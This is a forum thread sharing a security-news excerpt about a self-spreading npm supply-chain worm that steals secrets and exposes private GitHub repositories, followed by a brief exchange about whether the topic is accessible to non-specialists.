this post was submitted on 16 Sep 2025
61 points (100.0% liked)

Technology

75205 readers
2980 users here now

This is a most excellent place for technology news and articles.

Our Rules

  1. Follow the lemmy.world rules.
  2. Only tech related news or articles.
  3. Be excellent to each other!
  4. Mod approved content bots can post up to 10 articles per day.
  5. Threads asking for personal tech support may be deleted.
  6. Politics threads may be removed.
  7. No memes allowed as posts, OK to post as comments.
  8. Only approved bots from the list below, this includes using AI responses and summaries. To ask if your bot can be added please contact a mod.
  9. Check for duplicates before posting, duplicates may be removed
  10. Accounts 7 days and younger will have their posts automatically removed.

Approved Bots

founded 2 years ago
MODERATORS
L3s@lemmy.world
enu@lemmy.world
technopagan@lemmy.world
L4s@lemmy.world
L3s@hackingne.ws
L4s@hackingne.ws
61
S1ngularity/nx attackers strike again (www.aikido.dev)
submitted 1 day ago by Brkdncr@lemmy.world to c/technology@lemmy.world
12 comments fedilink hide all child comments
 

This morning, we were alerted to a large-scale attack against npm. This appears to the be work of the same threat actors behind the Nx attack on August 27th 2025. This was originally published by Socket and StepSecurity who noted 40 packages had been comrpomised, since then an additional 147 packages have been infected with malware including packages from CrowdStrike.

The scale, scope and impact of this attack is significant. The attackers are using the same playbook in large parts as the original attack, but have stepped up their game. They have turned it into a full worm, which does these things automatically:

  • Steal secrets and publish them to GitHub publicly
  • Run trufflehog and query Cloud metadata endpoints to gather secrets
  • Attempt to create a new GitHub action with a data exiltration mechanism through webhook[.]site
  • Iterate the repositories on GitHub a user has access to, and make them public

Since our initial alert this morning we’ve confirmed the following additional behaviours and important details. For those that don't know, Shai Hulud is the name for the worm in the Dune franchise. A clear indication of the intent of the attackers.

you are viewing a single comment's thread
view the rest of the comments
[–] A_A@lemmy.world 1 points 1 hour ago (1 children)

see my answer to the other user. that is :

Dear Sir or Mrs lennivelkant @ discuss.tchncs.de,

most people, even people in technology, have absolutely no clue what this thing is all about ... and reading the title here gives them no clue either.

Even going through the article, most people in technology would still don't know how this may affect them - - so context should be at least located - - this is what I was trying to do.

People in computer science see their field of expertise so deeply that they come to believe that the basis of their field is ubiquitous. Well, it is not. Not at all.

You people in that field are suffering from that delusion.

Now, the comment I wrote was a question. Only if you click on that question you have this hidden a.i. answer that was included and hidden in the comment. That answer was not the comment itself.

I certainly hope you don't have more of these questions and that people in "c.s." (computer science for the rest of us) could realize how far from the mundane they are.

all the best, - - A_A @ ...

[–] floquant@lemmy.dbzer0.com 1 points 1 hour ago

I do have a ton more questions, but I'm not sure if I want to ask them.